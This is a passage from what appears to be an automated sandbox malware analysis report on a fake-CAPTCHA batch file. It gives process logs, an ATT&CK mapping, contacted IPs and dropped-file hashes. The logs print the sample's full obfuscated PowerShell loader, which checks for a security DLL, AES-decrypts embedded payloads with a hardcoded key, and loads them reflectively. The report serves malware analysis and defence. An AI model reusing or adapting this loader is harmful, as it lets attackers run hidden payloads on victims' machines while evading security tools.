System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\captcha_v4id882994ft.bat';$kkoh='gcdbhetcdbhccdbhurcdbhrecdbhntcdbhpcdbhrcdbhocecdbhscdbhs'.replace('cdbh', ''),'trbvjsanbvjssfbvjsorbvjsmfibvjsnabvjslbbvjslobvjsckbvjs'.replace('bvjs', ''),'maijrdinmijrdodijrduijrdle'.replace('ijrd', ''),'epyvrlepyvrmepyvrntpyvrat'.replace('pyvr', ''),'enaikltaiklrypaikloaikliaiklnt'.replace('aikl', ''),'reaubtzdlubtzinubtzes'.replace('ubtz', ''),'chrklaanrklagerklaexrklaterklanrklasirklaon'.replace('rkla', ''),'loucgwaducgw'.replace('ucgw', ''),'cyndvreyndvayndvtyndvedeyndvcyndvryndvypyndvtoyndvryndv'.replace('yndv', ''),'coyevgpyyevgtoyevg'.replace('yevg', ''),'inogkevoogkekeogke'.replace('ogke', ''),'fwztzromwztzbwztzaswztzewztz6wztz4wztzstrwztzinwztzg'.replace('wztz', ''),'siszbpliszbiiszbtiszb'.replace('iszb', ''),'deayoncomayonprayonessayon'.replace('ayon', '');powershell -w hidden;$modules=[system.diagnostics.process]::($kkoh[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function rubtz($wsnje){$afysz=[system.security.cryptography.aes]::create();$afysz.mode=[system.security.cryptography.ciphermode]::cbc;$afysz.padding=[system.security.cryptography.paddingmode]::pkcs7;$afysz.key=[system.convert]::($kkoh[11])('sinwep/fk7rgqol4+myngailposrns1a+htyg2gc1lk=');$afysz.iv=[system.convert]::($kkoh[11])('yzogdg/vbgileun/jpga4q==');$fqbge=$afysz.($kkoh[8])();$auohi=$fqbge.($kkoh[1])($wsnje,0,$wsnje.length);$fqbge.dispose();$afysz.dispose();$auohi;}function lyexu($wsnje){$psbxz=new-object system.io.memorystream(,$wsnje);$qjwps=new-object system.io.memorystream;$kucrl=new-object system.io.compression.gzipstream($psbxz,[io.compression.compressionmode]::($kkoh[13]));$kucrl.($kkoh[9])($qjwps);$kucrl.dispose();$psbxz.dispose();$qjwps.dispose();$qjwps.toarray();}$cnxbi=[system.io.file]::($kkoh[5])([console]::title);$gbxfr=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 5).substring(2))));$hwatp=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 6).substring(2))));[system.reflection.assembly]::($kkoh[7])([byte[]]$hwatp).($kkoh[4]).($kkoh[10])($null,$null);[system.reflection.assembly]::($kkoh[7])([byte[]]$gbxfr).($kkoh[4]).($kkoh[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\captcha_v4id882994ft.bat';$kkoh='gcdbhetcdbhccdbhurcdbhrecdbhntcdbhpcdbhrcdbhocecdbhscdbhs'.replace('cdbh', ''),'trbvjsanbvjssfbvjsorbvjsmfibvjsnabvjslbbvjslobvjsckbvjs'.replace('bvjs', ''),'maijrdinmijrdodijrduijrdle'.replace('ijrd', ''),'epyvrlepyvrmepyvrntpyvrat'.replace('pyvr', ''),'enaikltaiklrypaikloaikliaiklnt'.replace('aikl', ''),'reaubtzdlubtzinubtzes'.replace('ubtz', ''),'chrklaanrklagerklaexrklaterklanrklasirklaon'.replace('rkla', ''),'loucgwaducgw'.replace('ucgw', ''),'cyndvreyndvayndvtyndvedeyndvcyndvryndvypyndvtoyndvryndv'.replace('yndv', ''),'coyevgpyyevgtoyevg'.replace('yevg', ''),'inogkevoogkekeogke'.replace('ogke', ''),'fwztzromwztzbwztzaswztzewztz6wztz4wztzstrwztzinwztzg'.replace('wztz', ''),'siszbpliszbiiszbtiszb'.replace('iszb', ''),'deayoncomayonprayonessayon'.replace('ayon', '');powershell -w hidden;$modules=[system.diagnostics.process]::($kkoh[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function rubtz($wsnje){$afysz=[system.security.cryptography.aes]::create();$afysz.mode=[system.security.cryptography.ciphermode]::cbc;$afysz.padding=[system.security.cryptography.paddingmode]::pkcs7;$afysz.key=[system.convert]::($kkoh[11])('sinwep/fk7rgqol4+myngailposrns1a+htyg2gc1lk=');$afysz.iv=[system.convert]::($kkoh[11])('yzogdg/vbgileun/jpga4q==');$fqbge=$afysz.($kkoh[8])();$auohi=$fqbge.($kkoh[1])($wsnje,0,$wsnje.length);$fqbge.dispose();$afysz.dispose();$auohi;}function lyexu($wsnje){$psbxz=new-object system.io.memorystream(,$wsnje);$qjwps=new-object system.io.memorystream;$kucrl=new-object system.io.compression.gzipstream($psbxz,[io.compression.compressionmode]::($kkoh[13]));$kucrl.($kkoh[9])($qjwps);$kucrl.dispose();$psbxz.dispose();$qjwps.dispose();$qjwps.toarray();}$cnxbi=[system.io.file]::($kkoh[5])([console]::title);$gbxfr=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 5).substring(2))));$hwatp=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 6).substring(2))));[system.reflection.assembly]::($kkoh[7])([byte[]]$hwatp).($kkoh[4]).($kkoh[10])($null,$null);[system.reflection.assembly]::($kkoh[7])([byte[]]$gbxfr).($kkoh[4]).($kkoh[10])($null,$null); "Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts11
Windows Management Instrumentation		1
Scripting		11
Process Injection		11
Masquerading		OS Credential Dumping31
Security Software Discovery		Remote ServicesData from Local System1
Non-Standard Port		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts22
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		51
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager51
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520617 Sample: Captcha_V4ID882994ft.bat Startdate: 27/09/2024 Architecture: WINDOWS Score: 56 23 tse1.mm.bing.net 2->23 25 ax-0001.ax-msedge.net 2->25 31 Multi AV Scanner detection for submitted file 2->31 33 AI detected suspicious sample 2->33 8 cmd.exe 1 2->8         started        10 svchost.exe 1 1 2->10         started        signatures3 process4 dnsIp5 13 powershell.exe 16 8->13         started        17 conhost.exe 8->17         started        19 cmd.exe 1 8->19         started        27 127.0.0.1 unknown unknown 10->27 process6 dnsIp7 29 185.91.69.119, 49731, 49742, 49747 ONO-ASCableuropa-ONOES Spain 13->29 35 Suspicious powershell command line found 13->35 21 powershell.exe 8 13->21         started        signatures8 process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Captcha_V4ID882994ft.bat32%ReversingLabsScript-PowerShell.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://aka.ms/pscore6lB0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ax-0001.ax-msedge.net
150.171.27.10
truefalse
    		unknown
    tse1.mm.bing.net
    		unknown
    		unknownfalse
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000F.00000003.2444946900.000001DAEEF00000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.drfalse
        		unknown
        http://crl.ver)svchost.exe, 0000000F.00000002.4064491206.000001DAEF093000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://g.live.com/odclientsettings/Prod1C:edb.log.15.drfalse
            		unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2138380420.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2138380420.00000000053B9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2138380420.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            185.91.69.119
            		unknownSpain
            		6739ONO-ASCableuropa-ONOESfalse

            Private

            IP
            127.0.0.1

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1520617
            Start date and time:2024-09-27 16:57:08 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 16s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:18
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Captcha_V4ID882994ft.bat
            Detection:MAL
            Classification:mal56.winBAT@9/12@1/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 6
            • Number of non-executed functions: 2
            Cookbook Comments:
            • Found application associated with file extension: .bat
            • Override analysis time to 240s for powershell

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 184.28.90.27
            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, mm-mm.bing.net.trafficmanager.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
            • Execution Graph export aborted for target powershell.exe, PID 2728 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • VT rate limit hit for: Captcha_V4ID882994ft.bat

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:58:01API Interceptor43x Sleep call for process: powershell.exe modified
            10:58:31API Interceptor3x Sleep call for process: svchost.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ax-0001.ax-msedge.nethttps://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==Get hashmaliciousHTMLPhisherBrowse
            • 150.171.28.10
            file.exeGet hashmaliciousUnknownBrowse
            • 150.171.27.10
            https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
            • 150.171.28.10
            http://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
            • 150.171.28.10
            http://home-101829.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 150.171.28.10
            http://sky-102142.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
            • 150.171.27.10
            http://bt-109018.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 150.171.27.10
            http://shaw-107439.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
            • 150.171.28.10
            https://bt-106726.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
            • 150.171.28.10
            https://btinternet-102233.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
            • 150.171.28.10

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ONO-ASCableuropa-ONOEShttp://esva.iafnetwork.comGet hashmaliciousUnknownBrowse
            • 185.91.71.82
            jade.mpsl.elfGet hashmaliciousMiraiBrowse
            • 85.155.51.116
            S1WVSiZOLX.elfGet hashmaliciousMirai, MoobotBrowse
            • 80.174.58.155
            firmware.mipsel.elfGet hashmaliciousUnknownBrowse
            • 213.227.56.170
            95.214.27.183-x86-2024-09-02T08_52_28.elfGet hashmaliciousUnknownBrowse
            • 62.100.100.128
            SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elfGet hashmaliciousMiraiBrowse
            • 80.224.32.205
            sora.spc.elfGet hashmaliciousMiraiBrowse
            • 62.81.167.12
            154.216.18.223-arm-2024-08-17T03_43_59.elfGet hashmaliciousMiraiBrowse
            • 62.42.1.150
            45.66.231.148-mipsel-2024-07-30T12_25_27.elfGet hashmaliciousUnknownBrowse
            • 2.152.232.211
            5DoEwwn6p2.elfGet hashmaliciousMiraiBrowse
            • 79.109.0.79

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\ProgramData\Microsoft\Network\Downloader\edb.chk

            Download File
            Process:C:\Windows\System32\svchost.exe
            File Type:data
            Category:dropped
            Size (bytes):8192
            Entropy (8bit):0.35901589905449205
            Encrypted:false
            SSDEEP:6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
            MD5:C788EDB928436D0CE10A5BF198837D8A
            SHA1:F104B6AB797E0B16362BFB69F5000407CE6EFFD8
            SHA-256:E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
            SHA-512:61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

            C:\ProgramData\Microsoft\Network\Downloader\edb.log

            Download File
            Process:C:\Windows\System32\svchost.exe
            File Type:data
            Category:dropped
            Size (bytes):1310720
            Entropy (8bit):0.7304360489554615
            Encrypted:false
            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0l:9JZj5MiKNnNhoxuY
            MD5:9038FBF15A9FE1D1A037806BC41B9C54
            SHA1:5B7828F6D940367B55FA1F0DC0E65E36C35332AE
            SHA-256:B55CC98999C52B7D681D6412B34BFA9E19EC5060088FFEFAC9CB2065C28BBCD8
            SHA-512:4D41A3470E9467FDE5087AEF4DABD30FE260D6A54F99940636C6F185C4D65F86BA873A23E3766AD631ACE3CB2A28B2B98F02F18C69D9B99E52D779E544BA1D29
            Malicious:false
            Reputation:low
            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

            Download File
            Process:C:\Windows\System32\svchost.exe
            File Type:Extensible storage user DataBase, version 0x620, checksum 0xbd411654, page size 16384, Windows version 10.0
            Category:dropped
            Size (bytes):1310720
            Entropy (8bit):0.6291272085534741
            Encrypted:false
            SSDEEP:1536:/SB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:/aza9iJa+2UtmOQOL
            MD5:DF567FA398EE9E2EE68D316FA9167358
            SHA1:84FBF606573811E84A83E61D0F037E541BDD2B84
            SHA-256:1A72EB4C504F1D0FE97C099EDF1F10C24F12B628FF1DFBD96EA3B9A45E47BEF0
            SHA-512:64F7D89C1E364AEDFE36900B95BA88B52FDC5DB979C8F57500DDE00690C8EB61CD02CF3AF4A8334A5DBC9C9A7F522760D9E98748FD7FE1700A5E03004F691E3D
            Malicious:false
            Reputation:low
            Preview:.A.T... .......P.......X\...;...{......................0.j.....*....|...:...|..h.g.....*....|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{.................................._.%q*....|....................*....|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

            Download File
            Process:C:\Windows\System32\svchost.exe
            File Type:data
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):0.0805455732880582
            Encrypted:false
            SSDEEP:3:qZFWetYeNPCkFsQXezvmk1Zt/9kqUXollHol///lZMPCyH:qZFTzNqkFsfzvT1ZtVjZpo5
            MD5:8F0D2563D6827AC45D6F70F6F8C61642
            SHA1:792B793F0CAEC8CD1DC068B691B48946DD11655A
            SHA-256:BC67DDC1769109ADFF88F81788DDCCD4280274BC27505A0D044AE3FF00DE0A22
            SHA-512:914A475C1A641C4DD75BBC23BEFF1849CAEC31D28F2D65D9F4758003FF3274F282377359AE44BA6A606F0DCDE2F40FF1F61CD35634644F0559434DAC641736D7
            Malicious:false
            Reputation:low
            Preview:..|......................................;...{...:...|..*....|..........*....|-.*....|......*....|.....................*....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:modified
            Size (bytes):5829
            Entropy (8bit):4.901113710259376
            Encrypted:false
            SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
            MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
            SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
            SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
            SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
            Malicious:false
            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.34726597513537405
            Encrypted:false
            SSDEEP:3:Nlll:Nll
            MD5:446DD1CF97EABA21CF14D03AEBC79F27
            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
            Malicious:false
            Preview:@...e...........................................................

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02m5ip05.ht3.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
